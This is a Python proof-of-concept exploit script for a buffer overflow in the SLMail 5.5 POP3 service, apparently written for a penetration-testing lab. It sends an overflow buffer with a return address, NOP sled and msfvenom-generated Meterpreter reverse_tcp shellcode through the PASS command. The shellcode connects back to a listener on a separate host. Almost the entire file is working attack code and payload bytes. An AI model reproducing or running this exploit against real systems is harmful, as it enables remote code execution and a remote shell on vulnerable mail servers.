#slmail 5.5 BOF poc
import socket
rhost = "10.11.14.62"
rport = 110
buffer = "A"*4654
#buffer += "B"*4
#buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
#"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
#"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
#"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
#"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
#"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
#"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
#"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer += "\x8F\x35\x4A\x5F"
buffer += "\x90" *20
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.47 LPORT=1337 -b "\x00\x0a\x0d" --smallest -f python
buf =  ""
buf += "\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
buf += "\x6f\xdb\x17\xb8\x83\xeb\xfc\xe2\xf4\x93\x33\x95\xb8"
buf += "\x6f\xdb\x77\x31\x8a\xea\xd7\xdc\xe4\x8b\x27\x33\x3d"
buf += "\xd7\x9c\xea\x7b\x50\x65\x90\x60\x6c\x5d\x9e\x5e\x24"
buf += "\xbb\x84\x0e\xa7\x15\x94\x4f\x1a\xd8\xb5\x6e\x1c\xf5"
buf += "\x4a\x3d\x8c\x9c\xea\x7f\x50\x5d\x84\xe4\x97\x06\xc0"
buf += "\x8c\x93\x16\x69\x3e\x50\x4e\x98\x6e\x08\x9c\xf1\x77"
buf += "\x38\x2d\xf1\xe4\xef\x9c\xb9\xb9\xea\xe8\x14\xae\x14"
buf += "\x1a\xb9\xa8\xe3\xf7\xcd\x99\xd8\x6a\x40\x54\xa6\x33"
buf += "\xcd\x8b\x83\x9c\xe0\x4b\xda\xc4\xde\xe4\xd7\x5c\x33"
buf += "\x37\xc7\x16\x6b\xe4\xdf\x9c\xb9\xbf\x52\x53\x9c\x4b"
buf += "\x80\x4c\xd9\x36\x81\x46\x47\x8f\x84\x48\xe2\xe4\xc9"
buf += "\xfc\x35\x32\xb3\x24\x8a\x6f\xdb\x7f\xcf\x1c\xe9\x48"
buf += "\xec\x07\x97\x60\x9e\x68\x52\xff\x47\xbf\x63\x87\xb9"
buf += "\x6f\xdb\x3e\x7c\x3b\x8b\x7f\x91\xef\xb0\x17\x47\xba"
buf += "\xb1\x1d\xd0\x65\xd0\x17\x97\x07\xd9\x17\xbd\x56\x52"
buf += "\xf1\xe8\x3f\x8b\x47\xf8\x3f\x9b\x47\xd0\x85\xd4\xc8"
buf += "\x58\x90\x0e\x80\xd2\x7f\x8d\x40\xd0\xf6\x7e\x63\xd9"
buf += "\x90\x0e\x92\x78\x1b\xd7\xe8\xf6\x67\xae\xfb\xd0\x9f"
buf += "\x6e\xb5\xee\x90\x0e\x7d\xb8\x05\xdf\x41\xef\x07\xd9"
buf += "\xce\x70\x30\x24\xc2\x33\x59\xb1\x57\xd0\x6f\xcb\x17"
buf += "\xb8\x39\xb1\x17\xd0\x37\x7f\x44\x5d\x90\x0e\x84\xeb"
buf += "\x05\xdb\x41\xeb\x38\xb3\x15\x61\xa7\x84\xe8\x6d\x6e"
buf += "\x18\x3e\x7e\x1a\x35\xd4\xb8"

#socket setup
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost, rport))
print "Connected"
s.recv(1024)
s.send('USER fml ' + '\r\n')
s.recv(1024)
s.send('PASS ' + buffer + buf  + '\r\n')
print "Sent"
s.close
